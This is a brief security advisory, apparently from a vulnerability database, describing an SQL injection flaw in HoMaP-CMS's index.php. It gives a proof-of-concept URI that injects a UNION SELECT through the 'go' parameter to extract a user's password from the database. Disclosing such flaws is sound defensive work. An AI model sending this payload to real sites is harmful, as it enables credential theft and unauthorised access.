HoMaP-CMS 'index.php' SQL Injection Vulnerability

info
discussion
exploit
solution
references

HoMaP-CMS 'index.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URI is available:

http://www.example.com/index.php?go=0'+union+select+passwd+from+user+where+username=[USERNAME]